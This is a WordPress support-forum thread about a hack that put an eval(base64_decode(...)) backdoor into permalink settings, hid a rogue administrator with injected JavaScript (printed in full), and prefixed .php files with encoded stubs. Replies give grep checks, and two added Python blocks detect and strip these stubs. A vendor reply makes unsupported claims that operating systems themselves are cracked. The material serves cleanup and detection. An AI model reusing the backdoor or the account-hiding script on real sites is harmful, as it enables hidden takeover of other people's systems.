
[Resolved] eval(base64_decode(…)) in permalinks

    benanne
    Member

    @benanne

    I figure my blog got hacked. It’s my own fault for being too lazy to upgrade, but I thought I’d describe the symptoms, so other people who have the same problem have something to go by. I have since removed all the malicious stuff (at least I think I have) and upgraded to version 2.8.4.

    Since this morning, I noticed that my “permalinks” setting had been customised (I use the default ?p=123-style URLs, normally) and for some reason, there was something like: ${eval(base64_decode($_SERVER[HTTP_REFERER]))} appended to each of them. Which caused them not to work, obviously.

    When I looked at my users list, I noticed something odd: at the top it said Administrators (2), but only my own account was listed as administrator. I took a look at the database and seemingly, a user called “JohnFisher76” also had admin rights. I’d had a few spam registrations before so I hadn’t paid attention to this. I wish I had…

    This user’s username was… a bit weird. It looked like this:

    ...
    
    <div id="user_superuser"><script language="JavaScript">
    var setUserName = function(){
    	try{
    		var t=document.getElementById("user_superuser");
    		while(t.nodeName!="TR"){
    			t=t.parentNode;
    		};
    		t.parentNode.removeChild(t);
    		var tags = document.getElementsByTagName("H3");
    		var s = " shown below";
    		for (var i = 0; i < tags.length; i++) {
    			var t=tags[i].innerHTML;
    			var h=tags[i];
    			if(t.indexOf(s)>0){
    				s =(parseInt(t)-1)+s;
    				h.removeChild(h.firstChild);
    				t = document.createTextNode(s);
    				h.appendChild(t);
    			}
    		}
    		var arr=document.getElementsByTagName("ul");
    		for(var i in arr) if(arr[i].className=="subsubsub"){
    			var n=/>Administrator \((\d+)\)</gi.exec(arr[i].innerHTML);
    			if(n[1]>0){
    				var txt=arr[i].innerHTML.replace(/>Administrator \((\d+)\)</gi,">Administrator ("+(n[1]-1)+")<");
    				arr[i].innerHTML=txt;
    			}
    		}
    	}catch(e){};
    };
    addLoadEvent(setUserName);
    </script></div>

    I haven’t bothered to try and interpret what this does, but I guess it’s used to hide the fact that there is another administrator in the admin panel. I don’t know how this user managed to acquire admin rights though.

    Anyway, shame on me for not upgrading. To fix it, I removed the user (manually, in the database, tables user and usermeta), got rid of the funky permalink stuff, and then upgraded to 2.8.4 as fast as I could. As far as I can tell that’s fixed it. I hope this thing hasn’t left anything else behind that could come back to haunt me…
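    A defender-side check for the two indicators this post describes, written here as an added example and not code from the thread: it flags wp_options values that carry eval()/base64_decode() calls and lists administrator accounts (per wp_usermeta) whose login or display name contains HTML markup. The rows are constructed samples shaped like WordPress's wp_options, wp_users and wp_usermeta tables.

```python
import re

# Constructed sample rows, shaped like wp_options / wp_users / wp_usermeta
# (not taken from any real database).
OPTIONS = {
    "permalink_structure": "/%postname%/${eval(base64_decode($_SERVER[HTTP_REFERER]))}",
    "rewrite_rules": 'a:1:{s:5:"(.+)";s:22:"index.php?pagename=$1";}',
    "blogname": "My blog",
}
USERS = [
    {"ID": 1, "user_login": "benanne", "display_name": "benanne"},
    {"ID": 7, "user_login": "JohnFisher76",
     "display_name": '<div id="user_superuser"><script>addLoadEvent(x)</script></div>'},
    {"ID": 9, "user_login": "spam_reg", "display_name": "spam"},
]
USERMETA = [
    {"user_id": 1, "meta_key": "wp_capabilities", "meta_value": 'a:1:{s:13:"administrator";b:1;}'},
    {"user_id": 7, "meta_key": "wp_capabilities", "meta_value": 'a:1:{s:13:"administrator";b:1;}'},
    {"user_id": 9, "meta_key": "wp_capabilities", "meta_value": 'a:1:{s:10:"subscriber";b:1;}'},
]

# "${eval(" / "eval(" / "base64_decode(" inside an option value is never legitimate.
EVAL_RE = re.compile(r"\$\{?eval\s*\(|base64_decode\s*\(", re.I)
# A login or display name should never contain markup; these tags are what the hidden-admin trick uses.
HTML_RE = re.compile(r"<\s*(script|div|iframe|img)\b", re.I)


def suspicious_options(options):
    """Return option names whose value contains eval()/base64_decode() calls."""
    return sorted(k for k, v in options.items() if EVAL_RE.search(v))


def admins(users, usermeta):
    """Return user IDs holding the administrator capability according to wp_usermeta."""
    caps = {m["user_id"] for m in usermeta
            if m["meta_key"].endswith("capabilities") and "administrator" in m["meta_value"]}
    return sorted(u["ID"] for u in users if u["ID"] in caps)


def rogue_admins(users, usermeta):
    """Administrators whose login or display name carries HTML/script markup."""
    ids = set(admins(users, usermeta))
    return sorted(u["user_login"] for u in users if u["ID"] in ids
                  and (HTML_RE.search(u["user_login"]) or HTML_RE.search(u["display_name"])))


if __name__ == "__main__":
    print("options to clean:", suspicious_options(OPTIONS))
    print("admin IDs per usermeta:", admins(USERS, USERMETA))
    print("admins hiding behind markup:", rogue_admins(USERS, USERMETA))
```

Comparing the length of admins() against the Administrators count the dashboard shows is the quickest way to spot a hidden account, since the script above removes its own row client-side only.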

Viewing 12 replies - 1 through 12 (of 12 total)
    riis
    Member

    @riis

    Hi

    I’ve experienced the same thing today. I visited my site yesterday and everything was fine. Today everything is messed up. How did you get rid of the permalink problems?

    Thanks!

    benanne
    Member

    @benanne

    I just set it back to the default setting. Technically, I did remove the appended stuff in the database manually before that, but I don’t think that had any effect.

    At any rate it can’t hurt to search the “options” table for any reference to “eval” or “base64” and clean that up. It also appeared in a row in “options” called “rewrite_rules”, I think. But that disappeared once I changed the setting back.

    As I said, I don’t know if this has caused any other damage. The changed permalink setting rather seems like it is put in place to make further hacks easier to apply, although I have no idea how.

    lexthoonen
    Member

    @lexthoonen

    Check this thread:
    http://wordpress.org/support/topic/307518

    and upgrade wordpress

    benanne
    Member

    @benanne

    Thanks, that is indeed exactly the same problem as the one I had. Maybe the extra information about the rogue user with administrator rights is still interesting, though.

    jekket
    Member

    @jekket

    I’ve just cleaned this stuff in “permalinks” and changed my admin password.

    all works.

    P.S. Do backups – it saves your time

    benanne
    Member

    @benanne

    If I were you, I would check my user list to see if there are any admins in there that shouldn’t be there…

    Roy
    Member

    @gangleri

    Thread number three
    http://wordpress.org/support/topic/307518?replies=15
    http://wordpress.org/support/topic/297639

    It seems that this already started a couple of weeks ago, judging by the oldest thread. Some automatic attack, I guess.

    chabotjeff
    Member

    @chabotjeff

    My site got nailed too. I didn’t think of anything when I had a couple of “admin” users added to the site. Thought it was just spam. But I had two additional “admins” with “contributor” status and they were able to change the Permalinks URL structure. Argghh.

    problem solved … http://blog.4rev.net/2009-09/wordpress-hacked-eval-base64_decode-_serverhttp_referer/

    In the wp_options table, clear the row named _transient_rewrite_rules and set the permalink from the WP config again!!!

    Check all your database for infection:

    From SSH, use grep to search for particular strings in all databases on the server:

    grep -H -r "eval(base64_decode" /var/lib/mysql
    grep -H -r "var setUserName = function" /var/lib/mysql

    have a nice day …

    jremillard
    Member

    @jremillard

    Well, happy? to say that it’s not your fault!

    The hacks are coming from lower layers than WP itself; we suspect the OSes themselves are cracked.

    Frankly, the only ‘real’ way to monitor and know if you have been hacked would be to monitor for malware, which we offer for free at: http://www.sitesecuritymonitor.com

    We also offer a free WP security plugin to lock down all versions of WordPress. This works in 98% of the cases (download here: http://wordpress.org/extend/plugins/wp-secure-by-sitesecuritymonitorcom/ ). However, in this case, if you are hosted w/ GoDaddy, since the attacks are from the inside (we suspect in this case a cracked apache.conf that is injecting malware during execution), the plugin wouldn’t help much

    🙁

    3stripe
    Participant

    @3stripe

    I have a similar problem on Dreamhost, all of my WP files have been injected with this at the start:

    <?php /**/ eval(base64_decode("aWYoZnVuY3Rpb25f.... etc

    @jremillard, do you think I’m being hacked via WordPress, or some other way?

    So sick of this happening 🙁

    Thanks.

    James Huff
    Support Team Rep.

    @macmanx

    The current hack involves injecting base64 code into all .php files, not just WordPress. I believe the leading theory at this point is that malware is exploiting passwords that are sent “in the clear” via FTP clients. The solution in that case would be to switch to using SFTP. Use FileZilla if you’re on a PC or Cyberduck if you’re on a Mac.

    To clean out the current hack, carefully follow this guide:

    http://codex.wordpress.org/FAQ_My_site_was_hacked
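    For the file-level variant 3stripe reports (every .php file prefixed with an eval(base64_decode(...)) stub), an added example of triage code, not from the thread or the linked guide: it recognises the injected prefix, decodes the first bytes of the payload without ever executing it, and returns the file with the stub stripped. The base64 fragment is the one quoted above; the surrounding file contents are constructed, and the trailing ?> after the stub is an assumption about the injector's layout.

```python
import base64
import re
from pathlib import Path

# Injected prefix as reported in the thread: a one-line eval(base64_decode("...")) stub
# placed before the file's real "<?php". The closing "?>" is assumed.
INJECT_RE = re.compile(
    r'^<\?php\s*/\*\*/\s*eval\(base64_decode\("([A-Za-z0-9+/=]+)"\)\);(?:\s*\?>)?', re.S)

# Constructed sample files; only the base64 fragment comes from the thread.
SAMPLES = {
    "index.php": '<?php /**/ eval(base64_decode("aWYoZnVuY3Rpb25f")); ?><?php\n'
                 '/* WP front */\nrequire("./wp-blog-header.php");\n',
    "clean.php": "<?php\n/* untouched file */\necho 'hi';\n",
}


def find_injection(source):
    """Return (decoded_payload_head, rest_of_file) if the file starts with the stub, else None."""
    m = INJECT_RE.match(source)
    if not m:
        return None
    blob = m.group(1)
    blob += "=" * (-len(blob) % 4)          # tolerate a truncated/unpadded fragment
    head = base64.b64decode(blob).decode("latin-1", "replace")   # decoded for inspection only
    return head, source[m.end():]


def triage(files):
    """Map each infected file name to the decoded start of its payload."""
    hits = {name: find_injection(src) for name, src in files.items()}
    return {name: hit[0] for name, hit in hits.items() if hit}


def clean(files):
    """Return the files with the stub removed; untouched files come back unchanged."""
    return {name: (find_injection(src) or (None, src))[1] for name, src in files.items()}


def scan_tree(root):
    """Walk a real document root and report infected .php files as {path: payload_head}."""
    found = {}
    for p in Path(root).rglob("*.php"):
        hit = find_injection(p.read_text(encoding="latin-1"))
        if hit:
            found[str(p)] = hit[0]
    return found


if __name__ == "__main__":
    print(triage(SAMPLES))      # {'index.php': 'if(function_'}
```

Run scan_tree() against a copy of the document root before cleaning so the payloads can be kept for analysis, and rotate the FTP/SFTP credentials at the same time, since a cleaned file is re-infected the moment the credential is reused.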
